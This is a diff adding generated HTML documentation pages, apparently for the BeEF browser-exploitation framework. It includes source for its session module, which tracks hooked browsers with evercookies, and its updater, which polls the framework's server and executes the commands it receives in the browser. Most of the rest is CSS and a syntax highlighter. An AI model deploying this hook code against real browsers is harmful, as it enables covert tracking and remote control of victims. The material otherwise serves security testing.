a.parentNode&&a.parentNode.removeChild(a);else for(a=a.firstChild;a;a=a.nextSibling)e(a);break;case 3:case 4:if(p){var b=a.nodeValue,d=b.match(t);if(d){var c=b.substring(0,d.index);a.nodeValue=c;(b=b.substring(d.index+d[0].length))&&a.parentNode.insertBefore(s.createTextNode(b),a.nextSibling);h(a);c||a.parentNode.removeChild(a)}}}}function h(a){function b(a,d){var e=d?a.cloneNode(!1):a,f=a.parentNode;if(f){var f=b(f,1),g=a.nextSibling;f.appendChild(e);for(var h=g;h;h=g)g=h.nextSibling,f.appendChild(h)}return e}
for(;!a.nextSibling;)if(a=a.parentNode,!a)return;for(var a=b(a.nextSibling,0),e;(e=a.parentNode)&&e.nodeType===1;)a=e;d.push(a)}var k=/(?:^|\s)nocode(?:\s|$)/,t=/\r\n?|\n/,s=a.ownerDocument,l;a.currentStyle?l=a.currentStyle.whiteSpace:window.getComputedStyle&&(l=s.defaultView.getComputedStyle(a,q).getPropertyValue("white-space"));var p=l&&"pre"===l.substring(0,3);for(l=s.createElement("LI");a.firstChild;)l.appendChild(a.firstChild);for(var d=[l],g=0;g<d.length;++g)e(d[g]);m===(m|0)&&d[0].setAttribute("value",
m);var r=s.createElement("OL");r.className="linenums";for(var n=Math.max(0,m-1|0)||0,g=0,z=d.length;g<z;++g)l=d[g],l.className="L"+(g+n)%10,l.firstChild||l.appendChild(s.createTextNode("\xa0")),r.appendChild(l);a.appendChild(r)}function k(a,m){for(var e=m.length;--e>=0;){var h=m[e];A.hasOwnProperty(h)?window.console&&console.warn("cannot override language handler %s",h):A[h]=a}}function C(a,m){if(!a||!A.hasOwnProperty(a))a=/^\s*</.test(m)?"default-markup":"default-code";return A[a]}function E(a){var m=
a.g;try{var e=M(a.h),h=e.a;a.a=h;a.c=e.c;a.d=0;C(m,h)(a);var k=/\bMSIE\b/.test(navigator.userAgent),m=/\n/g,t=a.a,s=t.length,e=0,l=a.c,p=l.length,h=0,d=a.e,g=d.length,a=0;d[g]=s;var r,n;for(n=r=0;n<g;)d[n]!==d[n+2]?(d[r++]=d[n++],d[r++]=d[n++]):n+=2;g=r;for(n=r=0;n<g;){for(var z=d[n],f=d[n+1],b=n+2;b+2<=g&&d[b+1]===f;)b+=2;d[r++]=z;d[r++]=f;n=b}for(d.length=r;h<p;){var o=l[h+2]||s,c=d[a+2]||s,b=Math.min(o,c),i=l[h+1],j;if(i.nodeType!==1&&(j=t.substring(e,b))){k&&(j=j.replace(m,"\r"));i.nodeValue=
j;var u=i.ownerDocument,v=u.createElement("SPAN");v.className=d[a+1];var x=i.parentNode;x.replaceChild(v,i);v.appendChild(i);e<o&&(l[h+1]=i=u.createTextNode(t.substring(b,o)),x.insertBefore(i,v.nextSibling))}e=b;e>=o&&(h+=2);e>=c&&(a+=2)}}catch(w){"console"in window&&console.log(w&&w.stack?w.stack:w)}}var v=["break,continue,do,else,for,if,return,while"],w=[[v,"auto,case,char,const,default,double,enum,extern,float,goto,int,long,register,short,signed,sizeof,static,struct,switch,typedef,union,unsigned,void,volatile"],
"catch,class,delete,false,import,new,operator,private,protected,public,this,throw,true,try,typeof"],F=[w,"alignof,align_union,asm,axiom,bool,concept,concept_map,const_cast,constexpr,decltype,dynamic_cast,explicit,export,friend,inline,late_check,mutable,namespace,nullptr,reinterpret_cast,static_assert,static_cast,template,typeid,typename,using,virtual,where"],G=[w,"abstract,boolean,byte,extends,final,finally,implements,import,instanceof,null,native,package,strictfp,super,synchronized,throws,transient"],
H=[G,"as,base,by,checked,decimal,delegate,descending,dynamic,event,fixed,foreach,from,group,implicit,in,interface,internal,into,is,lock,object,out,override,orderby,params,partial,readonly,ref,sbyte,sealed,stackalloc,string,select,uint,ulong,unchecked,unsafe,ushort,var"],w=[w,"debugger,eval,export,function,get,null,set,undefined,var,with,Infinity,NaN"],I=[v,"and,as,assert,class,def,del,elif,except,exec,finally,from,global,import,in,is,lambda,nonlocal,not,or,pass,print,raise,try,with,yield,False,True,None"],
J=[v,"alias,and,begin,case,class,def,defined,elsif,end,ensure,false,in,module,next,nil,not,or,redo,rescue,retry,self,super,then,true,undef,unless,until,when,yield,BEGIN,END"],v=[v,"case,done,elif,esac,eval,fi,function,in,local,set,then,until"],K=/^(DIR|FILE|vector|(de|priority_)?queue|list|stack|(const_)?iterator|(multi)?(set|map)|bitset|u?(int|float)\d*)/,N=/\S/,O=u({keywords:[F,H,w,"caller,delete,die,do,dump,elsif,eval,exit,foreach,for,goto,if,import,last,local,my,next,no,our,print,package,redo,require,sub,undef,unless,until,use,wantarray,while,BEGIN,END"+
I,J,v],hashComments:!0,cStyleComments:!0,multiLineStrings:!0,regexLiterals:!0}),A={};k(O,["default-code"]);k(x([],[["pln",/^[^<?]+/],["dec",/^<!\w[^>]*(?:>|$)/],["com",/^<\!--[\S\s]*?(?:--\>|$)/],["lang-",/^<\?([\S\s]+?)(?:\?>|$)/],["lang-",/^<%([\S\s]+?)(?:%>|$)/],["pun",/^(?:<[%?]|[%?]>)/],["lang-",/^<xmp\b[^>]*>([\S\s]+?)<\/xmp\b[^>]*>/i],["lang-js",/^<script\b[^>]*>([\S\s]*?)(<\/script\b[^>]*>)/i],["lang-css",/^<style\b[^>]*>([\S\s]*?)(<\/style\b[^>]*>)/i],["lang-in.tag",/^(<\/?[a-z][^<>]*>)/i]]),
["default-markup","htm","html","mxml","xhtml","xml","xsl"]);k(x([["pln",/^\s+/,q," \t\r\n"],["atv",/^(?:"[^"]*"?|'[^']*'?)/,q,"\"'"]],[["tag",/^^<\/?[a-z](?:[\w-.:]*\w)?|\/?>$/i],["atn",/^(?!style[\s=]|on)[a-z](?:[\w:-]*\w)?/i],["lang-uq.val",/^=\s*([^\s"'>]*(?:[^\s"'/>]|\/(?=\s)))/],["pun",/^[/<->]+/],["lang-js",/^on\w+\s*=\s*"([^"]+)"/i],["lang-js",/^on\w+\s*=\s*'([^']+)'/i],["lang-js",/^on\w+\s*=\s*([^\s"'>]+)/i],["lang-css",/^style\s*=\s*"([^"]+)"/i],["lang-css",/^style\s*=\s*'([^']+)'/i],["lang-css",
/^style\s*=\s*([^\s"'>]+)/i]]),["in.tag"]);k(x([],[["atv",/^[\S\s]+/]]),["uq.val"]);k(u({keywords:F,hashComments:!0,cStyleComments:!0,types:K}),["c","cc","cpp","cxx","cyc","m"]);k(u({keywords:"null,true,false"}),["json"]);k(u({keywords:H,hashComments:!0,cStyleComments:!0,verbatimStrings:!0,types:K}),["cs"]);k(u({keywords:G,cStyleComments:!0}),["java"]);k(u({keywords:v,hashComments:!0,multiLineStrings:!0}),["bsh","csh","sh"]);k(u({keywords:I,hashComments:!0,multiLineStrings:!0,tripleQuotedStrings:!0}),
["cv","py"]);k(u({keywords:"caller,delete,die,do,dump,elsif,eval,exit,foreach,for,goto,if,import,last,local,my,next,no,our,print,package,redo,require,sub,undef,unless,until,use,wantarray,while,BEGIN,END",hashComments:!0,multiLineStrings:!0,regexLiterals:!0}),["perl","pl","pm"]);k(u({keywords:J,hashComments:!0,multiLineStrings:!0,regexLiterals:!0}),["rb"]);k(u({keywords:w,cStyleComments:!0,regexLiterals:!0}),["js"]);k(u({keywords:"all,and,by,catch,class,else,extends,false,finally,for,if,in,is,isnt,loop,new,no,not,null,of,off,on,or,return,super,then,true,try,unless,until,when,while,yes",
hashComments:3,cStyleComments:!0,multilineStrings:!0,tripleQuotedStrings:!0,regexLiterals:!0}),["coffee"]);k(x([],[["str",/^[\S\s]+/]]),["regex"]);window.prettyPrintOne=function(a,m,e){var h=document.createElement("PRE");h.innerHTML=a;e&&D(h,e);E({g:m,i:e,h:h});return h.innerHTML};window.prettyPrint=function(a){function m(){for(var e=window.PR_SHOULD_USE_CONTINUATION?l.now()+250:Infinity;p<h.length&&l.now()<e;p++){var n=h[p],k=n.className;if(k.indexOf("prettyprint")>=0){var k=k.match(g),f,b;if(b=
!k){b=n;for(var o=void 0,c=b.firstChild;c;c=c.nextSibling)var i=c.nodeType,o=i===1?o?b:c:i===3?N.test(c.nodeValue)?b:o:o;b=(f=o===b?void 0:o)&&"CODE"===f.tagName}b&&(k=f.className.match(g));k&&(k=k[1]);b=!1;for(o=n.parentNode;o;o=o.parentNode)if((o.tagName==="pre"||o.tagName==="code"||o.tagName==="xmp")&&o.className&&o.className.indexOf("prettyprint")>=0){b=!0;break}b||((b=(b=n.className.match(/\blinenums\b(?::(\d+))?/))?b[1]&&b[1].length?+b[1]:!0:!1)&&D(n,b),d={g:k,h:n,i:b},E(d))}}p<h.length?setTimeout(m,
250):a&&a()}for(var e=[document.getElementsByTagName("pre"),document.getElementsByTagName("code"),document.getElementsByTagName("xmp")],h=[],k=0;k<e.length;++k)for(var t=0,s=e[k].length;t<s;++t)h.push(e[k][t]);var e=q,l=Date;l.now||(l={now:function(){return+new Date}});var p=0,d,g=/\blang(?:uage)?-([\w.]+)(?!\S)/;m()};window.PR={createSimpleLexer:x,registerLangHandler:k,sourceDecorator:u,PR_ATTRIB_NAME:"atn",PR_ATTRIB_VALUE:"atv",PR_COMMENT:"com",PR_DECLARATION:"dec",PR_KEYWORD:"kwd",PR_LITERAL:"lit",
PR_NOCODE:"nocode",PR_PLAIN:"pln",PR_PUNCTUATION:"pun",PR_SOURCE:"src",PR_STRING:"str",PR_TAG:"tag",PR_TYPE:"typ"}})();

125
docs/session.js.html Normal file
View File

@@ -0,0 +1,125 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: session.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: session.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides basic session functions.
* @namespace beef.session
*/
beef.session = {
hook_session_id_length: 80,
hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
ec: new evercookie(),
beefhook: "&lt;%= @hook_session_name %>",
/**
* Gets a string which will be used to identify the hooked browser session
*
* @example: var hook_session_id = beef.session.get_hook_session_id();
*/
get_hook_session_id: function() {
// check if the browser is already known to the framework
var id = this.ec.evercookie_cookie(beef.session.beefhook);
if (typeof id == 'undefined') {
var id = this.ec.evercookie_userdata(beef.session.beefhook);
}
if (typeof id == 'undefined') {
var id = this.ec.evercookie_window(beef.session.beefhook);
}
// if the browser is not known create a hook session id and set it
if ((typeof id == 'undefined') || (id == null)) {
id = this.gen_hook_session_id();
this.set_hook_session_id(id);
}
// return the hooked browser session identifier
return id;
},
/**
* Sets a string which will be used to identify the hooked browser session
*
* @example: beef.session.set_hook_session_id('RANDOMSTRING');
*/
set_hook_session_id: function(id) {
// persist the hook session id
this.ec.evercookie_cookie(beef.session.beefhook, id);
this.ec.evercookie_userdata(beef.session.beefhook, id);
this.ec.evercookie_window(beef.session.beefhook, id);
},
/**
* Generates a random string using the chars in hook_session_id_chars.
*
* @example: beef.session.gen_hook_session_id();
*/
gen_hook_session_id: function() {
// init the return value
var hook_session_id = "";
// construct the random string
for(var i=0; i&lt;this.hook_session_id_length; i++) {
var rand_num = Math.floor(Math.random()*this.hook_session_id_chars.length);
hook_session_id += this.hook_session_id_chars.charAt(rand_num);
}
return hook_session_id;
}
};
beef.regCmp('beef.session');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

358
docs/styles/jsdoc-default.css Normal file
View File

@@ -0,0 +1,358 @@
@font-face {
font-family: 'Open Sans';
font-weight: normal;
font-style: normal;
src: url('../fonts/OpenSans-Regular-webfont.eot');
src:
local('Open Sans'),
local('OpenSans'),
url('../fonts/OpenSans-Regular-webfont.eot?#iefix') format('embedded-opentype'),
url('../fonts/OpenSans-Regular-webfont.woff') format('woff'),
url('../fonts/OpenSans-Regular-webfont.svg#open_sansregular') format('svg');
}
@font-face {
font-family: 'Open Sans Light';
font-weight: normal;
font-style: normal;
src: url('../fonts/OpenSans-Light-webfont.eot');
src:
local('Open Sans Light'),
local('OpenSans Light'),
url('../fonts/OpenSans-Light-webfont.eot?#iefix') format('embedded-opentype'),
url('../fonts/OpenSans-Light-webfont.woff') format('woff'),
url('../fonts/OpenSans-Light-webfont.svg#open_sanslight') format('svg');
}
html
{
overflow: auto;
background-color: #fff;
font-size: 14px;
}
body
{
font-family: 'Open Sans', sans-serif;
line-height: 1.5;
color: #4d4e53;
background-color: white;
}
a, a:visited, a:active {
color: #0095dd;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
header
{
display: block;
padding: 0px 4px;
}
tt, code, kbd, samp {
font-family: Consolas, Monaco, 'Andale Mono', monospace;
}
.class-description {
font-size: 130%;
line-height: 140%;
margin-bottom: 1em;
margin-top: 1em;
}
.class-description:empty {
margin: 0;
}
#main {
float: left;
width: 70%;
}
article dl {
margin-bottom: 40px;
}
article img {
max-width: 100%;
}
section
{
display: block;
background-color: #fff;
padding: 12px 24px;
border-bottom: 1px solid #ccc;
margin-right: 30px;
}
.variation {
display: none;
}
.signature-attributes {
font-size: 60%;
color: #aaa;
font-style: italic;
font-weight: lighter;
}
nav
{
display: block;
float: right;
margin-top: 28px;
width: 30%;
box-sizing: border-box;
border-left: 1px solid #ccc;
padding-left: 16px;
}
nav ul {
font-family: 'Lucida Grande', 'Lucida Sans Unicode', arial, sans-serif;
font-size: 100%;
line-height: 17px;
padding: 0;
margin: 0;
list-style-type: none;
}
nav ul a, nav ul a:visited, nav ul a:active {
font-family: Consolas, Monaco, 'Andale Mono', monospace;
line-height: 18px;
color: #4D4E53;
}
nav h3 {
margin-top: 12px;
}
nav li {
margin-top: 6px;
}
footer {
display: block;
padding: 6px;
margin-top: 12px;
font-style: italic;
font-size: 90%;
}
h1, h2, h3, h4 {
font-weight: 200;
margin: 0;
}
h1
{
font-family: 'Open Sans Light', sans-serif;
font-size: 48px;
letter-spacing: -2px;
margin: 12px 24px 20px;
}
h2, h3.subsection-title
{
font-size: 30px;
font-weight: 700;
letter-spacing: -1px;
margin-bottom: 12px;
}
h3
{
font-size: 24px;
letter-spacing: -0.5px;
margin-bottom: 12px;
}
h4
{
font-size: 18px;
letter-spacing: -0.33px;
margin-bottom: 12px;
color: #4d4e53;
}
h5, .container-overview .subsection-title
{
font-size: 120%;
font-weight: bold;
letter-spacing: -0.01em;
margin: 8px 0 3px 0;
}
h6
{
font-size: 100%;
letter-spacing: -0.01em;
margin: 6px 0 3px 0;
font-style: italic;
}
table
{
border-spacing: 0;
border: 0;
border-collapse: collapse;
}
td, th
{
border: 1px solid #ddd;
margin: 0px;
text-align: left;
vertical-align: top;
padding: 4px 6px;
display: table-cell;
}
thead tr
{
background-color: #ddd;
font-weight: bold;
}
th { border-right: 1px solid #aaa; }
tr > th:last-child { border-right: 1px solid #ddd; }
.ancestors, .attribs { color: #999; }
.ancestors a, .attribs a
{
color: #999 !important;
text-decoration: none;
}
.clear
{
clear: both;
}
.important
{
font-weight: bold;
color: #950B02;
}
.yes-def {
text-indent: -1000px;
}
.type-signature {
color: #aaa;
}
.name, .signature {
font-family: Consolas, Monaco, 'Andale Mono', monospace;
}
.details { margin-top: 14px; border-left: 2px solid #DDD; }
.details dt { width: 120px; float: left; padding-left: 10px; padding-top: 6px; }
.details dd { margin-left: 70px; }
.details ul { margin: 0; }
.details ul { list-style-type: none; }
.details li { margin-left: 30px; padding-top: 6px; }
.details pre.prettyprint { margin: 0 }
.details .object-value { padding-top: 0; }
.description {
margin-bottom: 1em;
margin-top: 1em;
}
.code-caption
{
font-style: italic;
font-size: 107%;
margin: 0;
}
.source
{
border: 1px solid #ddd;
width: 80%;
overflow: auto;
}
.prettyprint.source {
width: inherit;
}
.source code
{
font-size: 100%;
line-height: 18px;
display: block;
padding: 4px 12px;
margin: 0;
background-color: #fff;
color: #4D4E53;
}
.prettyprint code span.line
{
display: inline-block;
}
.prettyprint.linenums
{
padding-left: 70px;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
}
.prettyprint.linenums ol
{
padding-left: 0;
}
.prettyprint.linenums li
{
border-left: 3px #ddd solid;
}
.prettyprint.linenums li.selected,
.prettyprint.linenums li.selected *
{
background-color: lightyellow;
}
.prettyprint.linenums li *
{
-webkit-user-select: text;
-moz-user-select: text;
-ms-user-select: text;
user-select: text;
}
.params .name, .props .name, .name code {
color: #4D4E53;
font-family: Consolas, Monaco, 'Andale Mono', monospace;
font-size: 100%;
}
.params td.description > p:first-child,
.props td.description > p:first-child
{
margin-top: 0;
padding-top: 0;
}
.params td.description > p:last-child,
.props td.description > p:last-child
{
margin-bottom: 0;
padding-bottom: 0;
}
.disabled {
color: #454545;
}

111
docs/styles/prettify-jsdoc.css Normal file
View File

@@ -0,0 +1,111 @@
/* JSDoc prettify.js theme */
/* plain text */
.pln {
color: #000000;
font-weight: normal;
font-style: normal;
}
/* string content */
.str {
color: #006400;
font-weight: normal;
font-style: normal;
}
/* a keyword */
.kwd {
color: #000000;
font-weight: bold;
font-style: normal;
}
/* a comment */
.com {
font-weight: normal;
font-style: italic;
}
/* a type name */
.typ {
color: #000000;
font-weight: normal;
font-style: normal;
}
/* a literal value */
.lit {
color: #006400;
font-weight: normal;
font-style: normal;
}
/* punctuation */
.pun {
color: #000000;
font-weight: bold;
font-style: normal;
}
/* lisp open bracket */
.opn {
color: #000000;
font-weight: bold;
font-style: normal;
}
/* lisp close bracket */
.clo {
color: #000000;
font-weight: bold;
font-style: normal;
}
/* a markup tag name */
.tag {
color: #006400;
font-weight: normal;
font-style: normal;
}
/* a markup attribute name */
.atn {
color: #006400;
font-weight: normal;
font-style: normal;
}
/* a markup attribute value */
.atv {
color: #006400;
font-weight: normal;
font-style: normal;
}
/* a declaration */
.dec {
color: #000000;
font-weight: bold;
font-style: normal;
}
/* a variable name */
.var {
color: #000000;
font-weight: normal;
font-style: normal;
}
/* a function name */
.fun {
color: #000000;
font-weight: bold;
font-style: normal;
}
/* Specify class=linenums on a pre to get line numbering */
ol.linenums {
margin-top: 0;
margin-bottom: 0;
}

132
docs/styles/prettify-tomorrow.css Normal file
View File

@@ -0,0 +1,132 @@
/* Tomorrow Theme */
/* Original theme - https://github.com/chriskempson/tomorrow-theme */
/* Pretty printing styles. Used with prettify.js. */
/* SPAN elements with the classes below are added by prettyprint. */
/* plain text */
.pln {
color: #4d4d4c; }
@media screen {
/* string content */
.str {
color: #718c00; }
/* a keyword */
.kwd {
color: #8959a8; }
/* a comment */
.com {
color: #8e908c; }
/* a type name */
.typ {
color: #4271ae; }
/* a literal value */
.lit {
color: #f5871f; }
/* punctuation */
.pun {
color: #4d4d4c; }
/* lisp open bracket */
.opn {
color: #4d4d4c; }
/* lisp close bracket */
.clo {
color: #4d4d4c; }
/* a markup tag name */
.tag {
color: #c82829; }
/* a markup attribute name */
.atn {
color: #f5871f; }
/* a markup attribute value */
.atv {
color: #3e999f; }
/* a declaration */
.dec {
color: #f5871f; }
/* a variable name */
.var {
color: #c82829; }
/* a function name */
.fun {
color: #4271ae; } }
/* Use higher contrast and text-weight for printable form. */
@media print, projection {
.str {
color: #060; }
.kwd {
color: #006;
font-weight: bold; }
.com {
color: #600;
font-style: italic; }
.typ {
color: #404;
font-weight: bold; }
.lit {
color: #044; }
.pun, .opn, .clo {
color: #440; }
.tag {
color: #006;
font-weight: bold; }
.atn {
color: #404; }
.atv {
color: #060; } }
/* Style */
/*
pre.prettyprint {
background: white;
font-family: Consolas, Monaco, 'Andale Mono', monospace;
font-size: 12px;
line-height: 1.5;
border: 1px solid #ccc;
padding: 10px; }
*/
/* Specify class=linenums on a pre to get line numbering */
ol.linenums {
margin-top: 0;
margin-bottom: 0; }
/* IE indents via margin-left */
li.L0,
li.L1,
li.L2,
li.L3,
li.L4,
li.L5,
li.L6,
li.L7,
li.L8,
li.L9 {
/* */ }
/* Alternate shading for lines */
li.L1,
li.L3,
li.L5,
li.L7,
li.L9 {
/* */ }

74
docs/timeout.js.html Normal file
View File

@@ -0,0 +1,74 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: timeout.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: timeout.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Sometimes there are timing issues and looks like beef_init
* is not called at all (always in cross-origin situations,
* for example calling the hook with jquery getScript,
* or sometimes with event handler injections).
*
* To fix this, we call again beef_init after 1 second.
* Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece
* antisnatchor
* @namespace beef.timeout
*/
/**
* @memberof beef.timeout
* @function setTimeout
*/
setTimeout(beef_init, 1000);
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

144
docs/updater.js.html Normal file
View File

@@ -0,0 +1,144 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: updater.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: updater.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Object in charge of getting new commands from the BeEF framework and execute them.
* The XHR-polling channel is managed here. If WebSockets are enabled,
* websocket.ls is used instead.
* @namespace beef.updater
*/
beef.updater = {
/** XHR-polling timeout. */
xhr_poll_timeout: "&lt;%= @xhr_poll_timeout %>",
/** Hook session name. */
beefhook: "&lt;%= @hook_session_name %>",
/** A lock. */
lock: false,
/** An object containing all values to be registered and sent by the updater. */
objects: new Object(),
/**
* Registers an object to always send when requesting new commands to the framework.
* @param {String} key the name of the object.
* @param {String} value the value of that object.
*
* @example beef.updater.regObject('java_enabled', 'true');
*/
regObject: function(key, value) {
this.objects[key] = escape(value);
},
// Checks for new commands from the framework and runs them.
check: function() {
if(this.lock == false) {
if (beef.logger.running) {
beef.logger.queue();
}
beef.net.flush();
if(beef.commands.length > 0) {
this.execute_commands();
}else {
this.get_commands(); /*Polling*/
}
}
/* The following gives a stupid syntax error in IE, which can be ignored*/
setTimeout(function(){beef.updater.check()}, beef.updater.xhr_poll_timeout);
},
/**
* Gets new commands from the framework.
*/
get_commands: function() {
try {
this.lock = true;
beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
if (response.body != null &amp;&amp; response.body.length > 0)
beef.updater.execute_commands();
});
} catch(e) {
this.lock = false;
return;
}
this.lock = false;
},
/**
* Executes the received commands, if any.
*/
execute_commands: function() {
if(beef.commands.length == 0) return;
this.lock = true;
while(beef.commands.length > 0) {
command = beef.commands.pop();
try {
command();
} catch(e) {
beef.debug('execute_commands - command failed to execute: ' + e.message);
// prints the command source to be executed, to better trace errors
// beef.client_debug must be enabled in the main config
beef.debug(command.toString());
}
}
this.lock = false;
}
};
beef.regCmp('beef.updater');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

767
docs/webrtc.js.html Normal file
View File

@@ -0,0 +1,767 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: webrtc.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: webrtc.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
